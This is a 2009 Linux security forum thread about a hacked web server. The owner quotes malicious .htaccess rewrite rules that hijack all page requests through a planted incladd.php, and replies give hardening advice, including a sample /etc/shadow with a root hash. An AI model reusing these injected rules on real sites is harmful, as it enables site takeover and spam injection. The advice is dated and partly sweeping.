LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   Site compromised...htaccess modified (https://www.linuxquestions.org/questions/linux-security-4/site-compromised-htaccess-modified-718142/)

bhm8hwcm 04-10-2009 03:14 AM
Site compromised...htaccess modified
 
I host a few sites on my own server and recently one of them was compromised. I was alerted by Google that they were dropping me from their index due to hidden links. Upon further inspection I found that my .htaccess file was altered with:

RewriteCond /home/sitename/public_html/mailer/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !ca0272.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /mailer/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]

I am removed the files and so far things are ok.

My question is what would allow this type of thing to happen? I assume my username and password would have to be known to do this?

Any suggestions on starting points where I should look to fix things?

As well I need to get my site reindexed as it is important to me and I was thinking of hiring some kind of outside service to review my server setup security wise. Any recommendations on such service providers that are reasonably priced?

tronayne 04-10-2009 07:11 AM
Your .htaccess file(s) should be owned by root, group apache and mode should be 0640 for starters (the mode can be 0644 but probably better 0640). Generally, the files and directories in your htdocs directory ought to be owned by root, group apache (or root) and mode set as restricted as necessary to be usable (but no public read, write or execute) -- this depends upon the application, but generally directories can be mode 0750 and files mode 0640 unless the files need to be executable in which case you want to set them to 750 (start with the most restrictive and change mode(s) if things don't work right).

Check your log (probably /var/log/messages) to see if somebody managed to guess a password and get into your system. You're looking, mostly, for log entries that contain the pattern sshd or password.

If somebody did guess a password, you've got some work to do -- first, change the root password to a pattern containing letters, punctuation and digits at least eight characters long. Look at /etc/shadow (this is where the passwords are actually stored); it should look pretty much like this
Code:
root:$1$Kmh1qikS$e/d9aya89zO2F0EfXkglq/:14268:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
user accounts start here
All that gobbledygook on the first line is the encrypted root password; the only account (other than user accounts) that should have a password in this file is root -- all the rest should be an asterisk!

Consider installing DenyHosts (http://denyhosts.sourceforge.net), which dynamically identifies bad actors and denies them access to your system with entries in /etc/hosts.deny; it also shares bad actors world-wide with other DenyHosts users (so you get a pretty good list of hosts to deny access to your system).

Consider installing IPTABLES country ban entries; ban at least China, Korea and possibly Russia, Bulgaria, Japan, India and Pakistan (where most of this crap comes from). You can get appropriate entries for doing this at http://www.countryipblocks.net.

Nobody (no user) needs read-write access to your htdocs tree -- including "you." Review the owner, group and mode settings and change them if needed. Change all your passwords (letters, punctuation and digits) and force your users to do the same (see the -e option for the passwd utility). If you have dead accounts, use the -i or -d option for the passwd utility to disable them.

Hope this helps some.

sleddog 04-10-2009 09:15 AM
It sounds like bhm8hwcm is doing virtual hosting (more than one domain) with webroots at /home/*/username/public_html. So the security of Apache's htdocs directory isn't really the issue here.

A quick google for "incladd.php" turns up lots of similar incidents. The cause is most likely an exploited web script running on the affected domain, possibly Joomla or an addon or some other CMS/blog/forum package.

What I'd suggest you do is:

- Take the site offline now before it creates more trouble.
- Research "incladd.php" to find commonalities with your setup, to identify the source of the problem. Fixing .htaccess is not a solution, it will happen again.
- Rebuild the site from scratch, uses the latest version of all web applications. Be very wary of any third-party modules.

Regards to ownership and permissions, all files and directories should be owned by the account user. Permissions for files should be no higher than 644 (including .htaccess), and directories no higher than 755.

Some CMSs/blogs/forums instruct you to chmod .htaccess to 777 so that the setup script can write to it. Once the setup is done you should immediately change .htaccess permissions to 644, or else you're wide open to this kind of exploit. Any file or directory that is writable by Apache can lead to trouble if you are running a web application that has known exploits.


All times are GMT -5. The time now is 02:51 PM.